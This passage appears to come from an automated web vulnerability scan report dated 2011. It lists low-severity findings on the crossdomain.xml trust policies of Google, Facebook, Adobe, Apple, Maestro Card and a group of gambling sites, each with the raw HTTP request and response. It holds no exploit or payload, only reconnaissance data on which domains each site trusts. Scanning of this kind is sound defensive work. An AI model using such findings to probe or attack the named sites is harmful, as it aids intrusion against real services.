HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Mon, 16 May 2011 03:47:50 GMT Expires: Tue, 17 May 2011 03:47:50 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 32661 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://secure.neogames |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: secure.neogames-tech.com |
HTTP/1.1 200 OK Content-Length: 305 Content-Type: text/xml Last-Modified: Wed, 04 Aug 2010 09:29:36 GMT Accept-Ranges: bytes ETag: "54fca8db733cb1:1396" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:31:56 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.neogames-tech.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://server.iad |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: server.iad.liveperson.net |
HTTP/1.1 200 OK Content-Length: 526 Content-Type: text/xml Content-Location: http://server.iad Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT Accept-Ranges: bytes ETag: "076249f5c35c91:d1a" Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" Date: Mon, 16 May 2011 11:41:46 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.neogames-tech.com" secure="false" /> ...[SNIP]... <allow-access-from domain="secure.neogames-tech.com" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.qa.neogames-tech ...[SNIP]... <allow-access-from domain="secure.st.neogames-tech ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.30.147.196 X-Cnection: close Date: Mon, 16 May 2011 12:49:44 GMT Content-Length: 1473 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> <allow-access-from domain="www.facebook.com" /> <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> ...[SNIP]... <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://sv.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sv.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:03:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://sv.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sv.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:48:46 GMT Accept-Ranges: bytes ETag: "e6c238448b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:45:23 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://sv.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sv.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://sv.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sv.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://sv.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: sv.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:13:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://svenskalotter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: svenskalotter.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://video.google.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: video.google.com |
HTTP/1.0 200 OK Date: Fri, 13 May 2011 19:18:03 GMT Expires: Sat, 12 May 2012 19:18:03 GMT X-Content-Type-Options: nosniff Content-Type: text/x-cross-domain Last-Modified: Sat, 09 Apr 2011 00:14:17 GMT Server: VSFE_1.0 X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=31536000 Age: 235056 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="s.ytimg.com" /> <allow-access-from domain="*.youtube.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.adobe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.adobe.com |
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT ETag: "144-bec64ec0" Accept-Ranges: bytes Cache-Control: max-age=21600 Expires: Mon, 16 May 2011 14:18:48 GMT Keep-Alive: timeout=5, max=500 Content-Type: text/x-cross-domain Connection: close Date: Mon, 16 May 2011 12:12:42 GMT Age: 25 Content-Length: 324 <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.macromedia.com" /> <allow-access-from domain="*.adobe.com" /> <allow-access-from domain="*.photoshop.com" /> <allow-access-from domain="*.acrobat.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.apple.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.apple.com |
HTTP/1.0 200 OK Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT ETag: "8d-3f8918f48ef00" Server: Apache/2.2.3 (Oracle) X-N: S X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT nnCoection: close Content-Type: application/xml Content-Length: 141 Cache-Control: max-age=179 Expires: Mon, 16 May 2011 12:28:06 GMT Date: Mon, 16 May 2011 12:25:07 GMT Connection: close <cross-domain-policy> <allow-access-from domain="wdirect.apple.com" /> <allow-access-from domain="*.apple.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:41:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.crazyscratch.com |
HTTP/1.1 200 OK Cache-Control: max-age=2592000 Content-Type: text/xml Last-Modified: Mon, 03 May 2010 07:05:08 GMT Accept-Ranges: bytes ETag: "2634e3f68eeaca1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:41:28 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.54.122.38 Connection: close Content-Length: 1473 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> ...[SNIP]... <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> <allow-access-from domain="static.ak.fbcdn.net" /> <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hopa.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hopa.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:41:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.info |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.info.crazyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:41:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.info.winnings |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.info.winnings.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:41:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:42:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.maestrocard |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.maestrocard.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:24:07 GMT Server: Apache Last-Modified: Fri, 01 Oct 2010 08:45:01 GMT ETag: "183-35cd3d40" Accept-Ranges: bytes Content-Length: 387 Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.mastercard.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mastercardbusiness.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.priceless.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mundirasca.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:41:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pclscratch.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pclscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:02:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.primegrattage |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.primegrattage.com |
HTTP/1.1 200 OK Content-Length: 282 Content-Type: text/xml Last-Modified: Mon, 04 Apr 2011 11:36:37 GMT Accept-Ranges: bytes ETag: "f640a48ebcf2cb1:357c" Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT" X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:00:34 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.primegrattage.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.primescratchcards.com |
HTTP/1.1 200 OK Content-Length: 286 Content-Type: text/xml Last-Modified: Thu, 31 Dec 2009 01:34:45 GMT Accept-Ranges: bytes ETag: "daca8c6eb989ca1:357c" Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:40:23 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.primescratchcards.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:42:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scratchca |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.scratchcardheaven.com |
